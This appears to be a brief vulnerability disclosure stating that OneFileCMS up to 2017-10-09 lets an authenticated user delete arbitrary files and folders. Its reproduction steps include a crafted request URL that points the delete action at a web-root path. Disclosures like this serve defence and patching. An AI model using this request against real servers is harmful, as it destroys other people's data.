onefilecms.php in OneFileCMS through 2017-10-09 might allow attackers to delete anyfile or folders they want on the delete screen

[havysec]

access http://fragrant:30001/OneFileCMS/onefilecms.php by username/password

access http://fragrant:30001/OneFileCMS/onefilecms.php?i=var/www/html/&f=123.php&p=edit&p=deletefile

Click Delete File(s)